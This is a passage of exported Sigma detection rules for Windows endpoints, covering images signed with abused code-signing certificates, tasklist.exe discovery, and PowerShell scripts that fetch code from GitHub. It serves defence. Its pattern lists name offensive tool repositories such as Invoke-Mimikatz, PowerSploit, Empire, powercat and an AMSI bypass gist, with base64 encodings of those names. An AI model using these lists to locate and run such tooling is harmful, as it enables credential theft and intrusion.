'0DD4552A9AABC00F61E619F4812DAFADCAA48715'\n # https://blog.talosintelligence.com/old-certificate-new-signature/\n - '6BC9649368643760190234FBB8395F4CACC2C9CB' # WoSign Class 3 Code Signing CA - 绍兴易游网络科技有限公司\n - '8B91C4BA4546F16D407CEB58090E1C8D82CAF2AC' # thawte SHA256 Code Signing CA - 北京汇聚四海商贸有限公司\n - 'FE6885F629D920DCE90FB03F0DB7B95709811C0D' # thawte SHA256 Code Signing CA - 善君 韦\n - 'F981DB345F885899FAE9382D7D3BCAF75B1CE797' # VeriSign Class 3 Code Signing 2010 CA - Beijing Chunbai Technology Development Co., Ltd\n - 'C61A221389C98EE2FBC0E57A62DEE5A915E6C509' # VeriSign Class 3 Code Signing 2010 CA - Fuqing Yuntan Network Tech Co.,Ltd.\n - 
'7B69FF55D3C39BD7D67A10F341C1443425F0C83F' # VeriSign Class 3 Code Signing 2010 CA - Zhuhai liancheng Technology Co., Ltd.\n - '864FD20B322E8C7CDB0D7AA69C8475F09D602C3D' # VeriSign Class 3 Code Signing 2010 CA - Baoji zhihengtaiye co.,ltd\n - '85C58500333C98954160FCA3EE9A26B659A5F451' # VeriSign Class 3 Code Signing 2010 CA - Jiangsu innovation safety assessment Co., Ltd.\n - 'D715230B535C8937B469632EC6158761FD18AD21' # VeriSign Class 3 Code Signing 2010 CA - Shenzhen Luyoudashi Technology Co., Ltd.\n - 'DF788AA00EB400B552923518108EB1D4F5B7176B' # VeriSign Class 3 Code Signing 2010 CA - Beijing JoinHope Image Technology Ltd.\n - '775141B89F48B71DADC19F13011A46E537E7029C' # Thawte Code Signing CA - NHN USA Inc.\n # https://twitter.com/1ZRR4H/status/1699923793077055821\n # https://bazaar.abuse.ch/sample/1fc7dbbff1ea28f00d8c32de90c2559e4aa3629d26627094e92ff111e1092875/\n - '21A97512A2959B0E74729BE220102AEF1DCF56FD'\n # Koi Loader\n # https://www.virustotal.com/gui/file/a43d460e43d27df91c02292c1e7d5d7920c2b3dc3b2749b1bbc7f28657588947\n - '2A0B1BEDF4CCC933A5FDB885EDA8211F9B258ABE'\n # https://x.com/tangent65536/status/1914373135337701588\n - '22EACBF575EA3FF19A6F639E80E8768405C9BDFE'\n # https://expel.com/blog/you-dont-find-manualfinder-manualfinder-finds-you/\n - '99201EEE9807D24851026A8E8884E4C40245FAC7'\n # https://www.virustotal.com/gui/file/f9dd0b57a5c133ca0c4cab3cca1ac8debdc4a798b452167a1e5af78653af00c1\n - '9A6EE51A6A437603ACEE9ADC5F1A5F13329A7E59'\n # https://securelist.com/honeymyte-kernel-mode-rootkit/118590/\n # https://www.virustotal.com/gui/file/dc8b123d91a29661c92b0de3d4f06e0ca17b0633b87e45c09245d82bb84f3860\n - '1F33285626E81F4845936C7A2A55A46F6DADA651'\n\n condition: selection\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "ee61a59b-83ce-42a2-9df8-1e4845d704f0",
"rule_name": "Image Loaded Signed with Malicious Certificate",
"rule_description": "Detects loading of an image signed with a certificate that was used by malicious actors.\nThis can be indicative of a malicious actor trying to evade EDR/AV solutions with a forged signature.\nIt is recommended to analyze the loaded DLL for malicious contents.\n",
"rule_creation_date": "2022-11-17",
"rule_modified_date": "2025-12-30",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1553.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "ee92b750-faf4-4136-bc28-a275241bd6d5",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "low",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.628186Z",
"creation_date": "2026-03-23T11:45:34.628187Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.628192Z",
"rule_level": "low",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1057/",
"https://thedfirreport.com/2025/02/24/confluence-exploit-leads-to-lockbit-ransomware/",
"https://attack.mitre.org/software/S0057/"
],
"name": "t1057_tasklist.yml",
"content": "title: Process List Discovered via tasklist.exe\nid: ee92b750-faf4-4136-bc28-a275241bd6d5\ndescription: |\n Detects the execution of tasklist.exe, a tool used to gather detailed information about a computer's active processes.\n Attackers could attempt to get information about running processes on a system to gain an understanding of common software/applications running on systems within the network.\n It is recommended to investigate potential malicious actions taken by tasklist's ancestors and the execution context to determine the legitimacy of this action.\nreferences:\n - https://attack.mitre.org/techniques/T1057/\n - https://thedfirreport.com/2025/02/24/confluence-exploit-leads-to-lockbit-ransomware/\n - https://attack.mitre.org/software/S0057/\ndate: 2021/05/17\nmodified: 2026/02/11\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1057\n - attack.t1518\n - attack.s0057\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.Discovery\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n - Image|endswith: '\\tasklist.exe'\n # Renamed binaries\n - OriginalFileName: 'tasklist.exe'\n\n selection_tasklist_1:\n - CommandLine:\n - 'tasklist -v'\n - 'tasklist.exe -v'\n # remote computer\n - '* -s *'\n - '* /s *'\n - ParentCommandLine|contains:\n - '|*findstr*lsass'\n - '|*findstr*hurukai'\n - '|*findstr*MsMpEng'\n - '|*findstr*Defender'\n - '/v /FO csv >'\n\n selection_tasklist_2:\n ParentCommandLine:\n - 'cmd.exe /c tasklist'\n - 'cmd.exe /c tasklist.exe'\n - 'cmd.exe /c tasklist/v'\n - 'cmd.exe /c tasklist /v'\n - 'cmd.exe /c tasklist.exe/v'\n - 'cmd.exe /c tasklist.exe /v'\n GrandparentImage|endswith:\n - '\\powershell.exe'\n - '\\wsmprovhost.exe'\n\n selection_tasklist_3:\n IntegrityLevel: 'System'\n Ancestors|contains:\n - '|?:\\Windows\\System32\\winlogon.exe'\n - '|?:\\Windows\\explorer.exe'\n\n selection_injection:\n ParentImage|startswith:\n - '?:\\Windows\\System32\\'\n - 
'?:\\Windows\\SysWOW64\\'\n filter_injection:\n - ParentImage:\n - '?:\\Windows\\System32\\cmd.exe'\n - '?:\\Windows\\SysWOW64\\cmd.exe'\n - '?:\\Windows\\System32\\sihost.exe'\n - '?:\\Windows\\SysWOW64\\sihost.exe'\n - '?:\\Windows\\System32\\msiexec.exe'\n - '?:\\Windows\\SysWOW64\\msiexec.exe'\n - '?:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe'\n - '?:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe'\n - '?:\\Windows\\system32\\WindowsPowerShell\\v1.0\\PowerShell_ISE.exe'\n - '?:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShell_ISE.exe'\n - ParentCommandLine:\n - '?:\\WINDOWS\\system32\\wsmprovhost.exe -Embedding'\n - '?:\\WINDOWS\\SysWOW64\\wsmprovhost.exe -Embedding'\n\n # This is handled by the rule 3c0e776d-a6f9-49d4-b5b9-3d398c13d0ef\n exclusion_svc:\n CommandLine|contains:\n - ' -svc'\n - '/svc' # works with not space between command and argument\n\n exclusion_ancestors:\n Ancestors|contains:\n - '?:\\Program Files\\OpConxps\\MSLSAM\\MSLsam.exe'\n - '?:\\DSS Express\\Server\\DSS Service\\'\n\n exclusion_stanley:\n CommandLine: 'tasklist -v'\n ParentCommandLine|endswith: '\\Stanley\\MobileView\\services\\asset-manager\\tomcat\\bin\\x64\\tomcat?.exe //RS//mv_asset-manager'\n\n exclusion_heidelberg:\n CommandLine: 'tasklist -v'\n GrandparentCommandLine|contains: 'cmd.exe /c ?:\\Program Files (x86)\\Heidelberg\\Backup Toolkit\\'\n\n exclusion_talentia:\n GrandparentCommandLine|startswith: '?:\\Windows\\system32\\cscript.exe *\\Talentia\\IrisMaint\\IrisMaint.vbe '\n\n exclusion_dahua:\n Ancestors|contains: '?:\\DSS Express\\Server\\DSS Service\\DSS_Service.exe'\n\n condition: selection and ((1 of selection_tasklist_*) or (selection_injection and not filter_injection)) and not 1 of exclusion_*\nlevel: low\nconfidence: weak\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "ee92b750-faf4-4136-bc28-a275241bd6d5",
"rule_name": "Process List Discovered via tasklist.exe",
"rule_description": "Detects the execution of tasklist.exe, a tool used to gather detailed information about a computer's active processes.\nAttackers could attempt to get information about running processes on a system to gain an understanding of common software/applications running on systems within the network.\nIt is recommended to investigate potential malicious actions taken by tasklist's ancestors and the execution context to determine the legitimacy of this action.\n",
"rule_creation_date": "2021-05-17",
"rule_modified_date": "2026-02-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1057",
"attack.t1518"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "ee931a24-4f65-41b1-8a77-d16972bd8ad7",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.608593Z",
"creation_date": "2026-03-23T11:45:34.608596Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.608604Z",
"rule_level": "medium",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://thedfirreport.com/2020/11/23/pysa-mespinoza-ransomware/",
"https://attack.mitre.org/techniques/T1059/001/"
],
"name": "t1059_001_powershell_suspicious_urls_script.yml",
"content": "title: Suspicious Code Repository URL in PowerShell Script\nid: ee931a24-4f65-41b1-8a77-d16972bd8ad7\ndescription: |\n Detects the URL of suspicious code repository used to host malicious code/scripts in PowerShell scripts.\n Attackers can host malcious payloads on legitimate websites such as github.com evade network based detections.\n It is recommended to investigate the content that was downloaded by the PowerShell script, and any other malicious actions the script could have taken.\nreferences:\n - https://thedfirreport.com/2020/11/23/pysa-mespinoza-ransomware/\n - https://attack.mitre.org/techniques/T1059/001/\ndate: 2022/08/18\nmodified: 2025/06/04\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1059.001\n - classification.Windows.Source.PowerShellEvent\n - classification.Windows.Script.PowerShell\n - classification.Windows.Behavior.NetworkActivity\n - classification.Windows.Behavior.FileDownload\nlogsource:\n category: powershell_event\n product: windows\ndetection:\n selection:\n PowershellCommand|contains:\n # generic raw githubusercontent , this is oftently malicious stuff\n - '/raw.githubusercontent.com/'\n # /raw.githubusercontent.com/ in UTF16-LE in base64 with 3 different offsets, for PowerShell command-lines\n - 'LwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8A'\n - '8AcgBhAHcALgBnAGkAdABoAHUAYgB1AHMAZQByAGMAbwBuAHQAZQBuAHQALgBjAG8AbQAvA'\n - 'vAHIAYQB3AC4AZwBpAHQAaAB1AGIAdQBzAGUAcgBjAG8AbgB0AGUAbgB0AC4AYwBvAG0ALw'\n - '/gist.githubusercontent.com/'\n - 'LwBnAGkAcwB0AC4AZwBpAHQAaAB1AGIAdQBzAGUAcgBjAG8AbgB0AGUAbgB0AC4AYwBvAG0ALw'\n - '8AZwBpAHMAdAAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8A'\n - 'vAGcAaQBzAHQALgBnAGkAdABoAHUAYgB1AHMAZQByAGMAbwBuAHQAZQBuAHQALgBjAG8AbQAvA'\n\n # There is another rule for that\n filter_malicious:\n PowershellCommand|contains:\n # https://raw.githubusercontent.com/S3cur3Th1sSh1t/Creds/master/PowershellScripts/Find-Fruit.ps1\n # 
https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/master/WinPwn.ps1\n - '/S3cur3Th1sSh1t/'\n # /S3cur3Th1sSh1t/ in UTF16-LE in base64 with 3 different offsets, for PowerShell command-lines\n - 'LwBTADMAYwB1AHIAMwBUAGgAMQBzAFMAaAAxAHQALw'\n - '8AUwAzAGMAdQByADMAVABoADEAcwBTAGgAMQB0AC8A'\n - 'vAFMAMwBjAHUAcgAzAFQAaAAxAHMAUwBoADEAdAAvA'\n # 'https://raw.githubusercontent.com/pwnieexpress/Metasploit-framework/master/exploits/powershell/powerdump.ps1\n - '/pwnieexpress/'\n - 'LwBwAHcAbgBpAGUAZQB4AHAAcgBlAHMAcwAvA'\n - '8AcAB3AG4AaQBlAGUAeABwAHIAZQBzAHMALw'\n - 'vAHAAdwBuAGkAZQBlAHgAcAByAGUAcwBzAC8A'\n # https://raw.githubusercontent.com/EmpireProject/Empire/master/module_source/credentials/Invoke-Mimikatz.ps1\n - '/EmpireProject/'\n - 'LwBFAG0AcABpAHIAZQBQAHIAbwBqAGUAYwB0AC8A'\n - '8ARQBtAHAAaQByAGUAUAByAG8AagBlAGMAdAAvA'\n - 'vAEUAbQBwAGkAcgBlAFAAcgBvAGoAZQBjAHQALw'\n # https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1\n - '/PowerSploit/'\n - 'LwBQAG8AdwBlAHIAUwBwAGwAbwBpAHQALw'\n - '8AUABvAHcAZQByAFMAcABsAG8AaQB0AC8A'\n - 'vAFAAbwB3AGUAcgBTAHAAbABvAGkAdAAvA'\n # https://raw.githubusercontent.com/clymb3r/PowerShell/master/Invoke-Mimikatz/Invoke-Mimikatz.ps1\n - '/clymb3r/'\n - 'LwBjAGwAeQBtAGIAMwByAC8A'\n - '8AYwBsAHkAbQBiADMAcgAvA'\n - 'vAGMAbAB5AG0AYgAzAHIALw'\n - '/Invoke-Mimikatz/'\n - 'LwBJAG4AdgBvAGsAZQAtAE0AaQBtAGkAawBhAHQAegAvA'\n - '8ASQBuAHYAbwBrAGUALQBNAGkAbQBpAGsAYQB0AHoALw'\n - 'vAEkAbgB2AG8AawBlAC0ATQBpAG0AaQBrAGEAdAB6AC8A'\n # https://raw.githubusercontent.com/BloodHoundAD/BloodHound/804503962b6dc554ad7d324cfa7f2b4a566a14e2/Ingestors/SharpHound.ps1\n - '/BloodHoundAD/'\n - 'LwBCAGwAbwBvAGQASABvAHUAbgBkAEEARAAvA'\n - '8AQgBsAG8AbwBkAEgAbwB1AG4AZABBAEQALw'\n - 'vAEIAbABvAG8AZABIAG8AdQBuAGQAQQBEAC8A'\n # https://raw.githubusercontent.com/Kevin-Robertson/Inveigh/master/Inveigh.ps1\n - '/Kevin-Robertson/'\n - 'LwBLAGUAdgBpAG4ALQBSAG8AYgBlAHIAdABzAG8AbgAvA'\n - '8ASwBlAHYAaQBuAC0AUgBvAGIAZQByAHQAcwBvAG4ALw'\n - 
'vAEsAZQB2AGkAbgAtAFIAbwBiAGUAcgB0AHMAbwBuAC8A'\n # https://raw.githubusercontent.com/Veil-Framework/Veil-Pillage/master/data/PowerSploit/Invoke-Mimikatz.ps1\n - '/Veil-Framework/'\n - 'LwBWAGUAaQBsAC0ARgByAGEAbQBlAHcAbwByAGsALw'\n - '8AVgBlAGkAbAAtAEYAcgBhAG0AZQB3AG8AcgBrAC8A'\n - 'vAFYAZQBpAGwALQBGAHIAYQBtAGUAdwBvAHIAawAvA'\n # https://raw.githubusercontent.com/nullbind/Powershellery/master/Stable-ish/Get-SPN/Get-SPN.psm1\n - '/nullbind/Powershellery/'\n - 'LwBuAHUAbABsAGIAaQBuAGQALwBQAG8AdwBlAHIAcwBoAGUAbABsAGUAcgB5AC8A'\n - '8AbgB1AGwAbABiAGkAbgBkAC8AUABvAHcAZQByAHMAaABlAGwAbABlAHIAeQAvA'\n - 'vAG4AdQBsAGwAYgBpAG4AZAAvAFAAbwB3AGUAcgBzAGgAZQBsAGwAZQByAHkALw'\n # https://gist.githubusercontent.com/shantanu561993/6483e524dc225a188de04465c8512909/raw/db219421ea911b820e9a484754f03a26fbfb9c27/AMSI_bypass_Reflection.ps1\n - '/shantanu561993/'\n - 'LwBzAGgAYQBuAHQAYQBuAHUANQA2ADEAOQA5ADMALw'\n - '8AcwBoAGEAbgB0AGEAbgB1ADUANgAxADkAOQAzAC8A'\n - 'vAHMAaABhAG4AdABhAG4AdQA1ADYAMQA5ADkAMwAvA'\n # https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1\n - '/powercat/'\n - 'LwBwAG8AdwBlAHIAYwBhAHQALw'\n - '8AcABvAHcAZQByAGMAYQB0AC8A'\n - 'vAHAAbwB3AGUAcgBjAGEAdAAvA'\n # https://raw.githubusercontent.com/FuzzySecurity/PowerShell-Suite/master/Start-Eidolon.ps1\n - '/FuzzySecurity/PowerShell-Suite/'\n - 'LwBGAHUAegB6AHkAUwBlAGMAdQByAGkAdAB5AC8AUABvAHcAZQByAFMAaABlAGwAbAAtAFMAdQBpAHQAZQAvA'\n - '8ARgB1AHoAegB5AFMAZQBjAHUAcgBpAHQAeQAvAFAAbwB3AGUAcgBTAGgAZQBsAGwALQBTAHUAaQB0AGUALw'\n - 'vAEYAdQB6AHoAeQBTAGUAYwB1AHIAaQB0AHkALwBQAG8AdwBlAHIAUwBoAGUAbABsAC0AUwB1AGkAdABlAC8A'\n # https://raw.githubusercontent.com/The-Viper-One/PsMapExec/main/PsMapExec.ps1\n - '/The-Viper-One/'\n - 'LwBUAGgAZQAtAFYAaQBwAGUAcgAtAE8AbgBlAC8A'\n - '8AVABoAGUALQBWAGkAcABlAHIALQBPAG4AZQAvA'\n - 'vAFQAaABlAC0AVgBpAHAAZQByAC0ATwBuAGUALw'\n\n exclusion_modules:\n PowershellScriptPath|startswith:\n - '?:\\Program Files\\WindowsPowerShell\\Modules\\'\n - '?:\\Program Files 
(x86)\\WindowsPowerShell\\Modules\\'\n\n exclusion_telemetry:\n ProcessParentCommandLine: '?:\\WINDOWS\\system32\\CompatTelRunner.exe -m:appraiser.dll -f:DoScheduledTelemetryRun -cv:*'\n\n exclusion_known_ms:\n PowershellCommand|contains:\n - 'IconUri = ?https://raw.githubusercontent.com/microsoftgraph/msgraph-sdk-powershell/'\n - 'IconUri = ?https://raw.githubusercontent.com/pnp/media/master/optimized/pnp-projects/blue/png/pnp-powershell-300.png'\n - 'IconUri = ?https://raw.githubusercontent.com/powershell/psscriptanalyzer/master/logo.png'\n # C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\pnp.powershell\\pnp.powershell.psd1\n # https://raw.githubusercontent.com/pnp/media/40e7cd8952a9347ea44e5572bb0e49622a102a12/parker/ms/300w/parker-ms-300.png\n - 'IconUri = ?https://raw.githubusercontent.com/pnp/media/*/parker/ms/300w/parker-ms-300.png'\n - 'IconUri = ?https://raw.githubusercontent.com/SharePoint/sp-dev-docs/master/docs/images/sp-logo.png'\n - 'LicenseUri = ?https://raw.githubusercontent.com/Azure/azure-powershell/preview/LICENSE.txt'\n\n exclusion_terminal_icons:\n PowershellScriptPath|endswith: '\\Terminal-Icons.psd1'\n PowershellCommand|contains: 'https://raw.githubusercontent.com/devblackops/Terminal-Icons/master/LICENSE'\n\n exclusion_winscp:\n PowershellScriptPath|endswith: '\\WinSCP.psd1'\n PowershellCommand|contains: 'https://raw.githubusercontent.com/dotps1/WinSCP/master/LICENSE.md'\n\n exclusion_florian:\n PowershellCommand|contains: 'https://raw.githubusercontent.com/Neo23x0/'\n\n exclusion_vmware:\n # C:\\Program Files\\WindowsPowerShell\\Modules\\VMware.VimAutomation.WorkloadManagement\\12.4.0.18627055\\VMware.VimAutomation.WorkloadManagement.psd1\n # C:\\Program Files\\WindowsPowerShell\\Modules\\VMware.VimAutomation.Storage\\12.5.0.19106817\\VMware.VimAutomation.Storage.psd1\n # C:\\Program Files\\WindowsPowerShell\\Modules\\VMware.Sdk.vSphere.vCenter.OVF\\1.0.104.18678708\\VMware.Sdk.vSphere.vCenter.OVF.psd1\n # C:\\Users\\xxx\\OneDrive 
- xxx\\Documents\\WindowsPowerShell\\Modules\\VMware.VimAutomation.WorkloadManagement\\12.4.0.18627055\\VMware.VimAutomation.WorkloadManagement.psd1\n PowershellCommand|contains: 'https://raw.githubusercontent.com/vmware/PowerCLI-Example-Scripts/'\n\n exclusion_asbuiltreport:\n # C:\\Program Files\\WindowsPowerShell\\Modules\\AsBuiltReport\\1.0.5\\AsBuiltReport.psd1\n # C:\\Program Files\\WindowsPowerShell\\Modules\\AsBuiltReport.Cisco.UcsManager\\0.2.1\\AsBuiltReport.Cisco.UcsManager.psd1\n # C:\\Program Files\\WindowsPowerShell\\Modules\\AsBuiltReport.Core\\1.2.0\\AsBuiltReport.Core.psd1\n # C:\\Program Files\\WindowsPowerShell\\Modules\\AsBuiltReport.Rubrik.CDM\\1.0.1\\AsBuiltReport.Rubrik.CDM.psd1\n # ...\n PowershellCommand|contains|all:\n - '# Private data to pass to the module specified in RootModule/ModuleToProcess. This may also contain a PSData hashtable with additional module metadata used by PowerShell.'\n - '# Tags applied to this module. These help with module discovery in online galleries.'\n - 'https://raw.githubusercontent.com/AsBuiltReport/AsBuiltReport.'\n\n exclusion_pscribo:\n # C:\\Program Files\\WindowsPowerShell\\Modules\\PScribo\\0.9.1\\PScribo.psd1\n PowershellCommand|contains|all:\n - 'PScribo documentation PowerShell module/framework.'\n - 'https://raw.githubusercontent.com/iainbrighton/PScribo/master/LICENSE'\n - 'http://github.com/iainbrighton/PScribo'\n\n exclusion_sharepoint:\n # C:\\Program Files (x86)\\SharePointPnPPowerShell2013\\Modules\\SharePointPnPPowerShell2013\\SharePointPnPPowerShell2013.psd1\n PowershellCommand|contains|all:\n - 'SharePointPnP.PowerShell.20??.Commands.Format.ps1xml'\n - 'https://aka.ms/sppnp'\n - 'https://raw.githubusercontent.com/SharePoint/PnP-PowerShell/master/Commands/Resources/pnp.ico'\n\n # https://learn.microsoft.com/en-us/troubleshoot/windows-client/windows-troubleshooters/introduction-to-troubleshootingscript-toolset-tssv2\n exclusion_tssv2:\n PowershellCommand|contains: 
'https://raw.githubusercontent.com/microsoft/SDN/master/Kubernetes/windows/debug/collectlogs.ps1\" -Outfile _Kube_collectlogs.ps1'\n PowershellScriptPath|endswith: '\\TSSv2_NET.psm1'\n\n exclusion_psscripttool:\n PowershellCommand|contains: 'https://raw.githubusercontent.com/jdhitsolutions/PSScriptTools'\n PowershellScriptPath:\n - '?:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PSScriptTools\\\\*\\PSScriptTools.psd1'\n - '?:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PSScriptTools\\\\*\\PSScriptTools.ps1'\n\n exclusion_winutil:\n PowershellCommand|contains: 'https://raw.githubusercontent.com/ChrisTitusTech/winutil/'\n\n exclusion_osdeploy:\n PowershellCommand|contains: 'https://raw.githubusercontent.com/OSDeploy/OSD/master/'\n\n exclusion_microsoftteams:\n PowershellCommand|contains:\n - 'LicenseUri=https://raw.githubusercontent.com/MicrosoftDocs/office-docs-powershell/master/teams/LICENSE.txt'\n - \"LicenseUri = 'https://raw.githubusercontent.com/MicrosoftDocs/office-docs-powershell/master/teams/LICENSE.txt'\"\n\n exclusion_joinmodule:\n PowershellCommand|contains: 'https://raw.githubusercontent.com/iRon7/Join-Object/master/Join-Object.png'\n PowershellScriptPath: '*\\WindowsPowerShell\\Modules\\JoinModule\\\\*\\Join.psm1'\n\n exclusion_manageengine:\n ProcessGrandparentImage: '?:\\Program Files (x86)\\ManageEngine\\UEMS_Agent\\bin\\dcpatchscan.exe'\n\n exclusion_prtg:\n ProcessParentImage: '?:\\Program Files (x86)\\PRTG Network Monitor\\PRTG Probe.exe'\n PowershellScriptPath|startswith: '?:\\Program Files (x86)\\PRTG Network Monitor\\custom sensors\\'\n\n exclusion_azure1:\n ProcessImage: '?:\\Program Files\\AzureConnectedMachineAgent\\GCArcService2\\GC\\gc_worker.exe'\n PowershellScriptPath: '?:\\ProgramData\\GuestConfig\\Configuration\\AzureWindowsBaseline\\Modules\\Microsoft.OSConfig.Resource\\Helpers\\Microsoft.OSConfig\\Microsoft.OSConfig.psd1'\n exclusion_azure2:\n ProcessAncestors|contains: 
'|?:\\WindowsAzure\\GuestAgent_*\\WindowsAzureGuestAgent.exe|'\n PowershellScriptPath: '?:\\Packages\\Plugins\\Microsoft.Azure.AzureDefenderForServers.MDE.Windows\\\\*\\MdeExtensionHandler.ps1'\n\n exclusion_ltsvc:\n ProcessParentImage: '?:\\Windows\\LTSvc\\LTSVC.exe'\n\n exclusion_mslsam:\n ProcessParentImage: '?:\\Program Files\\OpConxps\\MSLSAM\\1\\MSLsam.exe'\n\n exclusion_psappdeploytoolkit:\n PowershellCommand|contains: 'IconUri = ?https://raw.githubusercontent.com/PSAppDeployToolkit/PSAppDeployToolkit/'\n\n exclusion_signed:\n Signed: 'true'\n Signature:\n - 'Microsoft Corporation'\n - 'VMware, Inc.'\n - 'Broadcom Inc'\n - 'Nutanix, Inc.'\n - 'Patch My PC, LLC' # PSAppDeployToolkit\n\n exclusion_legitimate_script:\n PowershellCommand|contains|all:\n - 'ModuleVersion = '\n - 'GUID = '\n - 'Author = '\n\n exclusion_url:\n PowershellCommand|contains:\n - 'https://raw.githubusercontent.com/DFFspace/CryptoBlocker/master/KnownExtensions.txt'\n - 'scoop install https://raw.githubusercontent.com/ScoopInstaller/Main/master/bucket/runat.json'\n - 'https://raw.githubusercontent.com/secureworks/family-of-client-ids-research/main/known-foci-clients.csv'\n - 'https://raw.githubusercontent.com/Romanitho/Winget-AutoUpdate/main/LICENSE'\n - 'https://raw.githubusercontent.com/JanDeDobbeleer/oh-my-posh/'\n - 'https://raw.githubusercontent.com/dotnet/core/refs/heads/main/release-notes/'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: medium\nconfidence: weak\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "ee931a24-4f65-41b1-8a77-d16972bd8ad7",
"rule_name": "Suspicious Code Repository URL in PowerShell Script",
"rule_description": "Detects the URL of suspicious code repository used to host malicious code/scripts in PowerShell scripts.\nAttackers can host malicious payloads on legitimate websites such as github.com to evade network-based detections.\nIt is recommended to investigate the content that was downloaded by the PowerShell script, and any other malicious actions the script could have taken.\n",
"rule_creation_date": "2022-08-18",
"rule_modified_date": "2025-06-04",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution"
],
"rule_technique_tags": [
"attack.t1059.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "eeafa996-2f93-4255-92a8-ee0893f25649",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.084352Z",
"creation_date": "2026-03-23T11:45:34.084354Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.084358Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/samratashok/nishang/blob/master/Utility/Start-CaptureServer.ps1",
"https://www.zscaler.com/blogs/security-research/steal-it-campaign",
"https://attack.mitre.org/techniques/T1059/001/",
"https://attack.mitre.org/techniques/T1212/"
],
"name": "t1059_001_powershell_malicious_cmdlet_captureserver_nishang_script.yml",
